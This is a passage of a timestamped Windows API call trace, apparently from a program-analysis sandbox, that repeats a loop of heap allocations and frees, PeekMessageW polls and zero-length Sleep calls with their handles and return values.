HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe978f0 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78c78 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.925] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cb0 | out: hHeap=0xc60000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec480 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c78 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cb0 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7af70 [0254.926] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.926] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.926] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.926] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.926] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.926] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.926] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.926] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.926] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.926] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.926] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.926] Sleep (dwMilliseconds=0x0) [0254.932] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.933] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.933] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.933] Sleep (dwMilliseconds=0x0) [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.933] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.933] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.934] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.934] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.934] Sleep (dwMilliseconds=0x0) [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.934] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.934] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.935] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.935] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.935] Sleep (dwMilliseconds=0x0) [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.935] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.935] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.935] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.936] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.936] Sleep (dwMilliseconds=0x0) [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.936] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.936] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.936] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.936] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.937] Sleep (dwMilliseconds=0x0) [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.937] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.937] Sleep (dwMilliseconds=0x0) [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.937] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.937] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.937] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.938] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.938] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.938] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.938] Sleep (dwMilliseconds=0x0) [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.938] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.938] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.938] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.939] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.939] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.939] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.939] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.939] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.939] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.939] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.939] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.939] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.941] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.941] Sleep (dwMilliseconds=0x0) [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.942] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.942] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 